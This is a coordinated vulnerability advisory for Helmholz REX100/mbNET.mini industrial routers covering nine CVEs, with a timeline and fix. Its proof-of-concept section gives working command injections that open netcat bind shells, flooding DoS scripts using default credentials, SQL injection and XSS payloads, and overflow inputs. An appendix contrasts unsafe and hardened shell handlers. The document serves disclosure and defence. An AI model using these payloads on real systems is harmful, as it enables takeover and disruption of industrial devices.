St. Pölten UAS 20250721-0
-------------------------------------------------------------------------------
              title| Multiple Vulnerabilities in REX100
            product| Helmholz Industrial Router REX100 / mbNET.mini
 vulnerable version| < 2.3.3
      fixed version| 2.3.3
         CVE number| CVE-2025-41673, CVE-2025-41674, CVE-2025-41675,
                   | CVE-2025-41676, CVE-2025-41677, CVE-2025-41678,
                   | CVE-2025-41679, CVE-2025-41680, CVE-2025-41681
             impact| High
           homepage| https://www.helmholz.de/
                   | https://mbconnectline.com/
              found| 2025-04-25
                 by| F. Bruckmoser, M. Eder, J. Heigl, M. Heudorn,
                   | G. Hofmarcher, M. Kadlec, M. Pristauz-Telsnigg,
                   | S. Resch, P. Schweinzer, M. Gschiel
                   |
                   | These vulnerabilities were discovered during research at
                   | St. Pölten UAS, supported and coordinated by CyberDanube.
                   |
                   | https://fhstp.ac.at
                   | https://cyberdanube.com
-------------------------------------------------------------------------------

Vendor description
-------------------------------------------------------------------------------
"Helmholz is your specialist when it comes to sophisticated products for your
automation projects. With current, clever system solutions from Helmholz, the
high demands placed on industrial networks in times of increasing automation
can be met both reliably and efficiently - including a high level of operating
convenience. The broad product spectrum ranges from a decentralized I/O system
to switches and repeaters, gateways, a NAT gateway/firewall and secure IoT
remote machine access."
Source: https://www.helmholz.de/en/company/about-helmholz/

Vulnerable versions
-------------------------------------------------------------------------------
Helmholz Industrial Router REX100 < 2.3.3
MBConnectline mbNET.mini < 2.3.3

Vulnerability overview
-------------------------------------------------------------------------------
1) Authenticated Command Injection via send_sms (CVE-2025-41674)
A command injection vulnerability has been identified in the send_sms
functionality of the device. An authenticated attacker can exploit this issue
to execute arbitrary commands as root on the device.

2) Authenticated Command Injection via diag (CVE-2025-41673)
A command injection vulnerability has been identified in the diag
functionality of the device. An authenticated attacker can exploit this issue
to execute arbitrary commands as root on the device.

3) Authenticated Command Injection via communication.sh (CVE-2025-41675)
A command injection vulnerability has been identified in the communication.sh
endpoint of the device. An authenticated attacker can exploit this issue to
execute arbitrary commands as root on the device.

4) Authenticated Denial of Service via send_sms (CVE-2025-41677)
A denial of service condition has been identified in the send_sms
functionality of the device. An authenticated attacker can exploit this issue
to make the device unresponsive until it is rebooted.

5) Authenticated Denial of Service via send_mail (CVE-2025-41676)
A denial of service condition has been identified in the send_mail
functionality of the device. An authenticated attacker can exploit this issue
to make the device unresponsive until it is rebooted.

6) Authenticated SQL Injection via cloud-status.sh (CVE-2025-41678)
A SQL injection has been identified in the cloud-status.sh endpoint of the
device. An authenticated attacker can exploit this issue to read out or modify
the SQLite database of the device.
7) Unauthenticated Buffer Overflow via confnet/serial (CVE-2025-41679)
A buffer overflow exists in the "serial" function of the confnet service of
the device. An unauthenticated attacker can exploit this issue to crash the
service or gain remote code execution on the device.

8) Unauthenticated Buffer Overflow via confnet/command (CVE-2025-41680)
A buffer overflow exists in the "command" function of the confnet service of
the device. An unauthenticated attacker can exploit this issue to crash the
service or gain remote code execution on the device.

9) Authenticated Persistent XSS via cloud-configure.sh (CVE-2025-41681)
A persistent XSS vulnerability has been identified in the cloud-configure.sh
endpoint of the device. An authenticated attacker can abuse this issue to
execute malicious JavaScript in the victim's browser when the victim uses the
web service of the device.

Proof of Concept
-------------------------------------------------------------------------------
1) Authenticated Command Injection via send_sms (CVE-2025-41674)
The action send_sms in the file /cgi-bin/cloud-status.sh is vulnerable to a
command injection. The text parameter is expanded by a shell, so a command
substitution placed in it is executed on the device.
The following POST request creates the file /hello.txt on the device:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
POST /cgi-bin/api.sh HTTP/1.1
Host: 10.69.43.18
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:138.0) Gecko/20100101 Firefox/138.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 74
Origin: http://10.69.34.3
DNT: 1
Sec-GPC: 1
Authorization: Basic
Connection: keep-alive
Referer: http://10.69.34.3/cgi-bin/cloud-status.sh

action=send_sms&numb='test'&text='test$(echo helloThere > /hello.txt)'
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-------------------------------------------------------------------------------
2) Authenticated Command Injection via diag (CVE-2025-41673)
The action diag in the file /cgi-bin/cloud-status.sh is vulnerable to a
command injection. The value of the parameter field of the portcheck operation
is passed on unchanged, so netcat options can be injected. The following POST
request starts a bind shell on port 8080:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
POST /cgi-bin/api.sh HTTP/1.1
Host: 10.69.45.3
Content-Length: 71
Authorization: Basic
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Connection: keep-alive

action=diag&operation=portcheck&parameter=-l -w 9999 -p 8080 -e /bin/sh
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-------------------------------------------------------------------------------
3) Authenticated Command Injection via communication.sh (CVE-2025-41675)
The action nc in the file communication.sh is vulnerable to a command
injection. The following GET request starts a bind shell on port 1337:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
curl 'http://192.168.0.100/cgi-bin/cloudsvr/communication.sh?action=nc&parameter=-l%20-p%201337%20-e%20%2Fbin%2Fsh' \
  -H 'Authorization: Basic aGVsbWhvbHo6cm91dGVy' \
  --insecure
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-------------------------------------------------------------------------------
4) Authenticated Denial of Service via send_sms (CVE-2025-41677)
The action send_sms is vulnerable to a denial of service condition. By sending
many concurrent requests, the device becomes unresponsive. The following script
issues 1000 requests with 512-byte values for numb and text, all in flight at
once (the thread pool is sized to the number of requests):
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
import requests
from concurrent.futures import ThreadPoolExecutor

HOST = "10.69.43.18"
PATH = "/cgi-bin/api.sh"
LENGTH = 512
ATTACKS = 1000

param = {
    'action': 'send_sms',
    'numb': 'X' * LENGTH,
    'text': 'X' * LENGTH,
}

url = f'http://{HOST}{PATH}'


def send_request(i):
    with requests.Session() as s:
        s.auth = ('helmholz', 'router')
        print(f'[+] - Sending Packet NR {i+1}...')
        # timeout so the worker returns once the device stops answering
        s.post(url, data=param, timeout=10)


# one worker per request so all ATTACKS requests hit the device concurrently
with ThreadPoolExecutor(max_workers=ATTACKS) as executor:
    executor.map(send_request, range(ATTACKS))
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-------------------------------------------------------------------------------
5) Authenticated Denial of Service via send_mail (CVE-2025-41676)
The action send_mail is vulnerable to a denial of service condition. By sending
many concurrent requests, the device becomes unresponsive. The following script
issues 5000 concurrent requests with 24-byte values:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#!/usr/bin/env python3
import requests
from concurrent.futures import ThreadPoolExecutor

HOST = "10.69.43.18"
PATH = "/cgi-bin/api.sh"
LENGTH = 24
ATTACKS = 5000

param = {
    'action': 'send_email',
    'addr': 'X' * LENGTH,
    'subj': 'X' * LENGTH,
    'text': 'X' * LENGTH,
}

url = f'http://{HOST}{PATH}'


def send_request(i: int) -> None:
    try:
        with requests.Session() as session:
            session.auth = ('helmholz', 'router')
            print(f'[+] Sending packet #{i + 1} ...')
            session.post(url, data=param, timeout=10)
    except requests.RequestException as exc:
        # expected once the device has stopped answering
        print(f'[-] Packet #{i + 1} failed: {exc}')


def main() -> None:
    # one worker per request so all ATTACKS requests are in flight at once
    with ThreadPoolExecutor(max_workers=ATTACKS) as executor:
        executor.map(send_request, range(ATTACKS))


if __name__ == "__main__":
    main()
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-------------------------------------------------------------------------------
6) Authenticated SQL Injection via cloud-status.sh (CVE-2025-41678)
A SQL injection has been identified in the cloud-status.sh endpoint of the
device. The language parameter is concatenated into an SQL statement, so an
attacker can close the quoted value and append further statements to read or
manipulate data inside the SQLite database.
The following request appends a REPLACE statement that stores a new row
(name "hacked", value "yes") in the config table:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
POST /cgi-bin/cloud-status.sh HTTP/1.1
Host: 10.69.35.3
Content-Length: 104
Authorization: Basic aGVsbWhvbHo6cm91dGVy
X-Requested-With: XMLHttpRequest
Accept-Language: en-US,en;q=0.9
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Origin: http://10.69.45.3
Referer: http://10.69.45.3/cgi-bin/cloud-status.sh
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

language=test%27%29%3B%20REPLACE%20INTO%20config%20%28name%2Cvalue%29%20VALUES%28%27hacked%27%2C%27yes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
URL-decoded, the injected value reads:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
test'); REPLACE INTO config (name,value) VALUES('hacked','yes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
A verification on the device shows the manipulated data:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$ echo "SELECT * FROM config WHERE name = 'hacked';" | sqlite3 /etc/db/config
hacked|yes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-------------------------------------------------------------------------------
7) Unauthenticated Buffer Overflow via confnet/serial (CVE-2025-41679)
The overflow is located inside the confnet binary. Exploitation requires the
serial number of the device, which the service itself discloses in response to
an info request. For interacting with the service, the script published by
SySS for CVE-2024-45274 has been used:
(www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-063.txt)

The serial number is first read from the device, then sent back padded with
zeros far beyond its original length. Afterwards the service no longer answers
the info request:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$ ./cve-2024-45274.py info 192.168.0.100
[*] Getting device info...
[+] Received response from ('192.168.0.100', 25353): R50168542

$ python3 cve-2024-45274.py cmd R501685420000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000 192.168.0.100 get_fw

$ ./cve-2024-45274.py info 192.168.0.100
[*] Getting device info...
[!] No response received within 3 seconds.
[!] No response received within 3 seconds.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-------------------------------------------------------------------------------
8) Unauthenticated Buffer Overflow via confnet/command (CVE-2025-41680)
The overflow is located inside the confnet binary. Exploitation requires the
serial number of the device, which the service itself discloses in response to
an info request.
For interacting with the service, the script published by SySS for
CVE-2024-45274 has been used:
(www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-063.txt)

Here the correct serial number is sent together with an oversized command
string. Afterwards the service no longer answers the info request:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$ ./cve-2024-45274.py info 192.168.0.100
[*] Getting device info...
[+] Received response from ('192.168.0.100', 25353): R50168542

$ python3 cve-2024-45274.py cmd R50168542 192.168.0.100 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbb
bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbccccccccccccccccccccccccccccccccccccccccccccc
ccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc
cccccccccccccccccccccccccccccccccccccccccccccdddddddddddddddddddddddddddddddddd
ddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
ddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddeeeeeeeeeeeee
eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee
eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee
eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeffffffffffffffffffffffffffffffffffffffffff
fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
fffffffffffffffffffffffffffffffffffff'

$ ./cve-2024-45274.py info 192.168.0.100
[*] Getting device info...
[!] No response received within 3 seconds.
[!] No response received within 3 seconds.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-------------------------------------------------------------------------------
9) Authenticated Persistent XSS via cloud-configure.sh (CVE-2025-41681)
A persistent XSS vulnerability has been identified in the cloud-configure.sh
endpoint of the device. An authenticated attacker can exploit this issue to
inject arbitrary JavaScript via the language parameter; the payload is executed
when the "help" page is opened. Since the attacker already needs valid
credentials, the impact of this vulnerability is very limited.
The following request stores the payload:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
POST /cgi-bin/cloud-status.sh HTTP/1.1
Host: 192.168.0.100
Content-Length: 250
Authorization: Basic aGVsbWhvbHo6cm91dGVy
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqWdUJv1Cc3G8GgCm
Accept: text/html,application/xhtml+xml,application/xml;
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

------WebKitFormBoundaryqWdUJv1Cc3G8GgCm
Content-Disposition: form-data; name="langchange"

1
------WebKitFormBoundaryqWdUJv1Cc3G8GgCm
Content-Disposition: form-data; name="language"

";alert(1)//"
------WebKitFormBoundaryqWdUJv1Cc3G8GgCm--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-------------------------------------------------------------------------------
The vulnerabilities were manually verified on an emulated device by using the
MEDUSA scalable firmware runtime (https://medusa.re).

Solution
-------------------------------------------------------------------------------
Update to the latest version.

Workaround
-------------------------------------------------------------------------------
Limit network access to the device or remove it if possible.

Recommendation
-------------------------------------------------------------------------------
St. Pölten UAS recommends that Helmholz customers upgrade the firmware to the
latest version available. A security assessment by a professional company is
advised.

Contact Timeline
-------------------------------------------------------------------------------
2025-06-11: Contacting Helmholz via psirt@helmholz.de.
2025-06-16: Contacting them again as their PGP setup was broken; sending them
            the advisory via a secure channel.
2025-06-17: Response from the manufacturer mbconnectline. The vulnerabilities
            are reproducible and present in the latest firmware.
2025-07-21: Coordinated release with PSIRT@VDE and Helmholz.

Web: https://www.fhstp.ac.at/
Twitter: https://x.com/fh_stpoelten
Mail: mis@fhstp.ac.at

EOF S. Dietz / @2025
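
Editorial appendix: hardened handling of the injected parameters
-------------------------------------------------------------------------------
The command injections in 1) to 3) and the SQL injection in 6) share one root
cause: a request parameter is spliced into a shell command line or an SQL
statement inside the .sh CGI endpoints (treated here as shell scripts). The
block below is an example added by the editor; it is not code from the
advisory, from Helmholz or from MB connect line. It models that pattern in a
small POSIX sh handler and places the hardened form beside each unsafe one.
Parameter names (numb, text, parameter, language) follow the PoCs; the
simulated modem call, the nc argv, the config table statement and the language
allowlist are assumptions, since the device's real scripts are not reproduced
in the advisory.

```shell
#!/bin/sh
# Editorial example, not code from the advisory, from Helmholz or from
# MB connect line. Models the unsafe handling behind findings 1)-3) and 6)
# and shows the hardened form next to each. The device's real scripts, the
# commands they build and the SQL they run are assumptions modelled on the PoCs.

# ---- findings 1)-3): parameter spliced into a shell command line ----------

# Unsafe: the request value becomes part of a string that a shell re-parses.
# With text='hi$(touch /tmp/pwned)' the command substitution runs before any
# SMS is sent, which is the shape of the send_sms PoC.
unsafe_send_sms() {
    numb="$1"; text="$2"
    eval "printf 'SMS to %s: %s\n' ${numb} ${text}"   # assumed modem call
}

# Hardened: allowlist the number, cap the text, then pass both as separate
# argv entries. No shell re-parses them, so '$(...)', ';' or backticks in the
# text are printed, not executed.
safe_send_sms() {
    numb="$1"; text="$2"
    case "$numb" in
        "" | *[!0-9+]*) return 1 ;;                        # digits and '+' only
    esac
    [ -n "$text" ] && [ "${#text}" -le 160 ] || return 1   # SMS-sized only
    printf 'SMS to %s: %s\n' "$numb" "$text"
}

# Finding 2) hands "parameter" to nc, so "-l -p 8080 -e /bin/sh" turns a port
# check into a bind shell. Hardened: accept a host and a port, check both,
# and emit a fixed nc argv (one element per line so it can be inspected).
safe_portcheck_argv() {
    host="$1"; port="$2"
    case "$host" in
        "" | -* | *[!A-Za-z0-9.-]*) return 1 ;;   # no option-like or odd hosts
    esac
    case "$port" in
        "" | *[!0-9]*) return 1 ;;                # digits only, no flags
    esac
    [ "${#port}" -le 5 ] || return 1
    [ "$port" -ge 1 ] && [ "$port" -le 65535 ] || return 1
    printf '%s\n' nc -z -w 3 "$host" "$port"
}

# ---- finding 6): parameter spliced into an SQL statement ------------------

# Unsafe: string concatenation. The PoC value
#   test'); REPLACE INTO config (name,value) VALUES('hacked','yes
# closes the literal and the VALUES list and appends a second statement; the
# trailing "');" of the original statement then completes it.
unsafe_language_sql() {
    printf "REPLACE INTO config (name,value) VALUES('language','%s');\n" "$1"
}

# SQLite escapes a single quote inside a string literal by doubling it.
sql_quote() {
    printf '%s' "$1" | sed "s/'/''/g"
}

# Hardened: the value must be one of the supported languages (assumed set),
# and is still quoted before it is placed in the literal (defence in depth).
safe_language_sql() {
    case "$1" in
        de | en | fr | it) ;;
        *) return 1 ;;
    esac
    printf "REPLACE INTO config (name,value) VALUES('language','%s');\n" \
        "$(sql_quote "$1")"
}

# Demo when run directly: the PoC values against the hardened variants and
# the unsafe SQL builder (the unsafe SMS handler is not called here because
# it would execute the injected command).
payload_text='hi$(id > /tmp/pwned)'
safe_send_sms 491701234567 "$payload_text"
safe_portcheck_argv 10.0.0.1 '8080 -e /bin/sh' || echo 'portcheck: rejected'
sqli="test'); REPLACE INTO config (name,value) VALUES('hacked','yes"
unsafe_language_sql "$sqli"
safe_language_sql "$sqli" || echo 'language: rejected'
```

The point of the hardened functions is not the character filtering but that
validated values reach nc or the SQL statement only as separate argv entries
or as an allowlisted literal, so neither a shell nor the SQL parser ever
re-interprets attacker-controlled text. The length cap on the SMS text bounds
the request size but does not by itself address the request flooding used in
4) and 5).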